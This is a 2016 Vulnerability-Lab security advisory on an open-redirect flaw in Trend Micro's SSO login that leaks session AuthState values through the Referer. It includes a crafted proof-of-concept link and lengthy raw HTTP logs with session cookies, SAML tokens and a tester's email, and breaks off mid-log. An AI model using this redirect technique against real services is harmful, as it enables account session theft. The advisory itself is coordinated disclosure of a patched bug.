TrendMicro SSO Redirect / Session Theft
Posted on 31 March 2016
Document Title: =============== Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1694 Trand Micro ID: 1-1-1035080936 Release Date: ============= 2016-03-31 Vulnerability Laboratory ID (VL-ID): ==================================== 1694 Common Vulnerability Scoring System: ==================================== 6.5 Product & Service Introduction: =============================== Trend Micro Inc. is a global security software company founded in Los Angeles, California with global headquarters in Tokyo, Japan, and regional headquarters in Asia, Europe and the Americas. The company develops security software for servers, cloud computing environments, and small business. Its cloud and virtualization security products provide cloud security for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva Chen serves as Trend Micro’s chief executive officer, a position she has held since 2005 when she succeeded founding CEO Steve Chang. Chang serves as chairman of Trend Micro. (Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a redirect and session web vulnerability in the official trend micro sso online service web-application. Vulnerability Disclosure Timeline: ================================== 2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-01-29: Vendor Notification (Trend Micro Security Team) 2016-02-02: Vendor Response/Feedback (Trend Micro Security Team) 2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team) 2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements] 2016-03-31: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Trend Micro Product: Account System - (Web-Application) 2016 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A redirect issue with information leaking has been discovered in the official Trendmirco online-service web-application. The vulnerability allows an attacker to send a crafted link to the victim. The execution (which requires a login) will disclose leaking information to the attackers webserver. In this case the AuthState value is beeing leaked. The vulnerability is located in the SSOService.php. A remote attacker is able to craft a link by modifing the RelayState parameter to his webserver. After the link is clicked by the victim the website requests him to login. After the login the victim is beeing quitly redirected to the webserver. The previous requests includes the new AuthState in the GET request which includes the users session. The AuthState is beeing exposed in the Referer afterwards. The attacker can use the AuthState value to overtake the account session. The vulnerability is located in the SSOService.php. A remote attacker is able to craft a link by modifing the RelayState parameter to his webserver. After the link is clicked by the victim the website requests him to login. After the login the victim is beeing quitly redirected to the webserver. The previous requests includes the new AuthState in the GET request which includes the users session. The AuthState is beeing exposed in the Referer afterwards. The attacker can use the AuthState value to overtake the account session. Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Send the victim the link https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US 2. The victim will redirect to yahoo 3. The AuthState code will cached on the referer of the attackers website ... like on yahoo 4. Successful reproduce of the vulnerability! --- PoC Session Logs [POST & GET] --- GET https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html] Request Headers: Host[sso1.trendmicro.com] User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate, br] Cookie[_ga=GA1.2.1194930175.1453994345; utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session; _mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684; s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405; mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D; mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D; mmcore.srv=ldnvwcgus01; __utma=44797537.1194930175.1453994345.1453996530.1454067543.2; __utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D; optimizelyEndUserId=oeu1453995412771r0.8692327924248602; optimizelyBuckets=%7B%7D; bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"}; __qca=P0-2089330722-1453996387067; mbox=session#1454067243496-470264#1454070070; SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y; db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true; ga_user_id=1194930175.1453994345; s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT; SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91] Connection[keep-alive] Response Headers: Date[Fri, 29 Jan 2016 12:20:22 GMT] Server[Apache/2.2.15 (CentOS)] Strict-Transport-Security[max-age=63072000; includeSubdomains; preload] X-Frame-Options[SAMEORIGIN] x-content-type-options[nosniff] Connection[close] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] POST https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[368] Mime Type[text/html] Request Headers: Host[account.trendmicro.com] User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate, br] Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US] Cookie[_ga=GA1.2.1194930175.1453994345; utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session; _mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684; s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405; mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D; mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D; mmcore.srv=ldnvwcgus01; __utma=44797537.1194930175.1453994345.1453996530.1454067543.2; __utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D; optimizelyEndUserId=oeu1453995412771r0.8692327924248602; optimizelyBuckets=%7B%7D; bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"}; __qca=P0-2089330722-1453996387067; mbox=session#1454067243496-470264#1454070070; s_cc=true; ga_user_id=1194930175.1453994345; s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT; SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f; SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773] Connection[keep-alive] Post Data: SAMLResponse[PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iIElEPSJfZGZkMjU2NGNkNjI1NTYzOTBjNDI1ZGJiOTA4YWY1MDNiOGQ1ZmUwMmJiIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiIERlc3RpbmF0aW9uPSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIj48c2FtbDpJc3N1ZXI%2BaHR0cHM6Ly9zc28xLnRyZW5kbWljcm8uY29tL3NpZ25pbi9zYW1sMi9pZHAvbWV0YWRhdGEucGhwPC9zYW1sOklzc3Vlcj48ZHM6U2lnbmF0dXJlIHhtbG5zOmRzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjIj4KICA8ZHM6U2lnbmVkSW5mbz48ZHM6Q2Fub25pY2FsaXphdGlvbk1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPgogICAgPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPgogIDxkczpSZWZlcmVuY2UgVVJJPSIjX2RmZDI1NjRjZDYyNTU2MzkwYzQyNWRiYjkwOGFmNTAzYjhkNWZlMDJiYiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3NoYTEiLz48ZHM6RGlnZXN0VmFsdWU%2BSDNlcVhEaWVOWG5YcnBRaUZ4cmxYZ25tbVJnPTwvZHM6RGlnZXN0VmFsdWU%2BPC9kczpSZWZlcmVuY2U%2BPC9kczpTaWduZWRJbmZvPjxkczpTaWduYXR1cmVWYWx1ZT5tTGVPZkpDZFRkQzRPTXp4dVk2NnEvcE91UG5LYUxTS2tBY1Y4RFoxM25iNklSSEFTV3hVL3dlZE96OU9WaXN6Y2lTN0h6dlpSQ2djQXo3amgwdTlpazlmam4yNE5PR09ObjZySG9ra0xQaXY4N2FpUWMvSkN6emd1M1pmQzcrV3pXOXY4QW5DZjIxWmZ6RDArWDZyb3lvLzkrQkVXVmtJVmkzNklEWVdWOFJSeXVqTVFQUFQxZ3NXYTVXUzQ3aE5WUmdZcyt3YmlzbklGMG81TWovaWlUdjdobUZaQ2VDTWljMm03RENQM2lnQlR3R0hrZnpsUC9FdldGcXJldnV3clZkVS9VS3FDRjltcXNjeG5INWE5YkNxZmU2ekIzK2wzdHZkSDgwd0Z3Tkg0aldvSWRXY1hPOTZEbUQ2MEs0QUQ1YVpIcW45Uk9YR1JwaUNyanhRL0E9PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BCjxkczpLZXlJbmZvPjxkczpYNTA5RGF0YT48ZHM6WDUwOUNlcnRpZmljYXRlPk1JSURGRENDQWZ5Z0F3SUJBZ0lKQUtoSmdOUDAvZzZhTUEwR0NTcUdTSWIzRFFFQkJRVUFNQkF4RGpBTUJnTlZCQU1UQlZSbGNuSmhNQjRYRFRFeE1ERXdNekF5TURFME4xb1hEVEl3TVRJek1UQXlNREUwTjFvd0VERU9NQXdHQTFVRUF4TUZWR1Z5Y21Fd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURad2FJSmVwdHJJaVV4WjVXbDVMVVEvS0VpbEtPRmRZTWdTSjg0RkxDRTNXYlk2U1NWcURqWmYvcEM1dU4waFg4R0xPL3Z2UExVaGFHa1ZpdXhzSVRYM1VOUThLT1VlVW1lMHBVb1lFSWxFbjdJRmZuR29SQlV1eDJaTkVXVWRXelV3Z3RrR2dqRzhnTnROTGlnT3ZJN1ZPTndPZEM3bzZ0TUlHWm12azA1NFZLN2ZKMTkyTTJYNnNmay9YQnBicE5NWk5hQWRrR2dISlJqNk9UR2I5QkFPbzR3M2E3RTd0eVRveEd2czFpQWtQalg1SXE2NGltTFdnOW1OWjMvNkpZOHVhMkVpcXZhU0lsSHFZZzNJNjA2OEdCYlhZeDJtZmNLdlNFbTBwdDFoTm0zOExGdVVJNC9TQm1vVDFKeXRLcTIvQnNLc2o3RnZDWkRYck5Xb1NRcEFnTUJBQUdqY1RCdk1CMEdBMVVkRGdRV0JCUzF3OU1HSWRxMmQ2MmlVSkJFKzdLem5xNTFOVEJBQmdOVkhTTUVPVEEzZ0JTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5hRVVwQkl3RURFT01Bd0dBMVVFQXhNRlZHVnljbUdDQ1FDb1NZRFQ5UDRPbWpBTUJnTlZIUk1FQlRBREFRSC9NQTBHQ1NxR1NJYjNEUUVCQlFVQUE0SUJBUUFQbDFtb0hUTGg1M3BkOGdhVU9uY1FJUFB6dFBvR1NiVURpclA2OFk5SVhGYmwwd3I3NnlFK0ROYys1cEExK0xZNDkvdjBPZ3BuTXY3UGlPTFhMQzNhdnpKVFhkSW9GS2Z2Mno3T24zaEp1d3EyUHpacHF4RXVzVEdHSkRHaW9BSnJSOU1PSzQ5Q1hVYmdaMTVvY0ZkUXVpays5ZDJXaHJqQW1ueEtLbVVJZWxOOEpWVjFTQWhwOUpjN2NiZTJJZVl0cFViSyt0QnVROFFvT01tTUtxTEh3UE5ad2RYT0o1NWFsNHBLT3VzVTJSOXpyZnREWXlFUU1KOHVIZkdCSzZtYnoxWEFDOG9QUW5FQ2VkS0I4a3I0eG9md09aWjRCSmNZZDhNQ3ptNUNXRmtBRHljQTRrNlVvd1pnODY0dWFEbk1lZ2VxN1Vwd3NlZks3RzFJVzdpSzwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbHA6U3RhdHVzPjxzYW1sOkFzc2VydGlvbiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIElEPSJfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiPjxzYW1sOklzc3Vlcj5odHRwczovL3NzbzEudHJlbmRtaWNyby5jb20vc2lnbmluL3NhbWwyL2lkcC9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BCiAgICA8ZHM6U2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3JzYS1zaGExIi8%2BCiAgPGRzOlJlZmVyZW5jZSBVUkk9IiNfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIj48ZHM6VHJhbnNmb3Jtcz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI2VudmVsb3BlZC1zaWduYXR1cmUiLz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPC9kczpUcmFuc2Zvcm1zPjxkczpEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjc2hhMSIvPjxkczpEaWdlc3RWYWx1ZT5sbk1xNmtkUHdCdTJ3WE04cjRZeEdqNGRMUFk9PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGRzOlNpZ25hdHVyZVZhbHVlPmpZbkxvblhIdEdCOGlxODRQZFpXOWpFdzJndWRxM0tEQ3FyMGtEQjl4TW4xUXE3TG1FQ3B6cUFRei93ZFFVSUx6cHlRNFgvQWREME5nTFJudk1nK0dEWmNjRWZvUWhTVC9VSithdmJHVFAvMTFrM2Mvczl5c0ZwcjlKSG5LOU9uMkUxUVlBeXdEMnhIWHE4NnZjNEU1YjVOYzM4MFozeUpkYi8yNmwxQllrWm9wV3ltMGY4L0EzUmJENlJNdkFBK1VPajUwK0FTcnMwa0N3SEdJSllCS2hwM3BwQXhPMWg3bkNqVGUremx2elpOV3RFTDNtOFpRQjhSckhQVU9CR2FZdjZTQTBHNDBRNkFyeE4yR3BHVjJENzN5MWprQ2ZSK0Q3d0RqUTMrRlBPekozNGo0L2haUi9seWJqeFRqTkFNUVpDbWk5UFM2dzNXcTJDL3EydHo3Zz09PC9kczpTaWduYXR1cmVWYWx1ZT4KPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJREZEQ0NBZnlnQXdJQkFnSUpBS2hKZ05QMC9nNmFNQTBHQ1NxR1NJYjNEUUVCQlFVQU1CQXhEakFNQmdOVkJBTVRCVlJsY25KaE1CNFhEVEV4TURFd016QXlNREUwTjFvWERUSXdNVEl6TVRBeU1ERTBOMW93RURFT01Bd0dBMVVFQXhNRlZHVnljbUV3Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLQW9JQkFRRFp3YUlKZXB0cklpVXhaNVdsNUxVUS9LRWlsS09GZFlNZ1NKODRGTENFM1diWTZTU1ZxRGpaZi9wQzV1TjBoWDhHTE8vdnZQTFVoYUdrVml1eHNJVFgzVU5ROEtPVWVVbWUwcFVvWUVJbEVuN0lGZm5Hb1JCVXV4MlpORVdVZFd6VXdndGtHZ2pHOGdOdE5MaWdPdkk3Vk9Od09kQzdvNnRNSUdabXZrMDU0Vks3ZkoxOTJNMlg2c2ZrL1hCcGJwTk1aTmFBZGtHZ0hKUmo2T1RHYjlCQU9vNHczYTdFN3R5VG94R3ZzMWlBa1BqWDVJcTY0aW1MV2c5bU5aMy82Slk4dWEyRWlxdmFTSWxIcVlnM0k2MDY4R0JiWFl4Mm1mY0t2U0VtMHB0MWhObTM4TEZ1VUk0L1NCbW9UMUp5dEtxMi9Cc0tzajdGdkNaRFhyTldvU1FwQWdNQkFBR2pjVEJ2TUIwR0ExVWREZ1FXQkJTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5UQkFCZ05WSFNNRU9UQTNnQlMxdzlNR0lkcTJkNjJpVUpCRSs3S3pucTUxTmFFVXBCSXdFREVPTUF3R0ExVUVBeE1GVkdWeWNtR0NDUUNvU1lEVDlQNE9takFNQmdOVkhSTUVCVEFEQVFIL01BMEdDU3FHU0liM0RRRUJCUVVBQTRJQkFRQVBsMW1vSFRMaDUzcGQ4Z2FVT25jUUlQUHp0UG9HU2JVRGlyUDY4WTlJWEZibDB3cjc2eUUrRE5jKzVwQTErTFk0OS92ME9ncG5NdjdQaU9MWExDM2F2ekpUWGRJb0ZLZnYyejdPbjNoSnV3cTJQelpwcXhFdXNUR0dKREdpb0FKclI5TU9LNDlDWFViZ1oxNW9jRmRRdWlrKzlkMldocmpBbW54S0ttVUllbE44SlZWMVNBaHA5SmM3Y2JlMkllWXRwVWJLK3RCdVE4UW9PTW1NS3FMSHdQTlp3ZFhPSjU1YWw0cEtPdXNVMlI5enJmdERZeUVRTUo4dUhmR0JLNm1iejFYQUM4b1BRbkVDZWRLQjhrcjR4b2Z3T1paNEJKY1lkOE1Dem01Q1dGa0FEeWNBNGs2VW93Wmc4NjR1YURuTWVnZXE3VXB3c2VmSzdHMUlXN2lLPC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kczpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPHNhbWw6U3ViamVjdD48c2FtbDpOYW1lSUQgU1BOYW1lUXVhbGlmaWVyPSJteWFjY291bnQtc3AiIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6dHJhbnNpZW50Ij5fNWVkYmFkMzJmYzYyNWM4Y2VjZWM0MjRmZGQzYmE5ZGY0NmM5ZWY4OWVjPC9zYW1sOk5hbWVJRD48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uIE1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmNtOmJlYXJlciI%2BPHNhbWw6U3ViamVjdENvbmZpcm1hdGlvbkRhdGEgTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDEyOjI1OjIzWiIgUmVjaXBpZW50PSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIi8%2BPC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24%2BPC9zYW1sOlN1YmplY3Q%2BPHNhbWw6Q29uZGl0aW9ucyBOb3RCZWZvcmU9IjIwMTYtMDEtMjlUMTI6MTk6NTNaIiBOb3RPbk9yQWZ0ZXI9IjIwMTYtMDEtMjlUMTI6MjU6MjNaIj48c2FtbDpBdWRpZW5jZVJlc3RyaWN0aW9uPjxzYW1sOkF1ZGllbmNlPm15YWNjb3VudC1zcDwvc2FtbDpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbj48L3NhbWw6Q29uZGl0aW9ucz48c2FtbDpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTYtMDEtMjlUMTE6NTE6MzlaIiBTZXNzaW9uTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDIwOjIwOjIzWiIgU2Vzc2lvbkluZGV4PSJfNzRhNjY1Y2I5NmE2ZDY0ZTQyZmE1YjhkNTAyYmRkYTEwNzZkMTQyMDhmIj48c2FtbDpBdXRobkNvbnRleHQ%2BPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmQ8L3NhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BPC9zYW1sOkF1dGhuQ29udGV4dD48L3NhbWw6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWw6QXR0cmlidXRlU3RhdGVtZW50PjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj5zYW1pckBldm9sdXRpb24tc2VjLmNvbTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudE5hbWUiIE5hbWVGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphdHRybmFtZS1mb3JtYXQ6YmFzaWMiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlIHhzaTp0eXBlPSJ4czpzdHJpbmciPnNhbWlyQGV2b2x1dGlvbi1zZWMuY29tPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBdHRyaWJ1dGU%2BPHNhbWw6QXR0cmlidXRlIE5hbWU9IkNvbnN1bWVyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj41MDE5NzM3Mzwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ%2BPC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D] RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F] Response Headers: Date[Fri, 29 Jan 2016 12:20:24 GMT] Server[Apache] Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d; path=/; httponly] Location[https://yahoo.com/my_account/] Pragma[no-cache] Cache-Control[no-cache, must-revalidate] Vary[Accept-Encoding] Content-Encoding[gzip] X-Frame-Options[SAMEORIGIN] Content-Length[368] Connection[close] Content-Type[text/html; charset=UTF-8] GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime Type[text/html] Request Headers: Host[yahoo.com] User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate, br] Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F] Cookie[B=] Connection[keep-alive] Response Headers: Date[Fri, 29 Jan 2016 11:52:31 GMT] Via[https/1.1 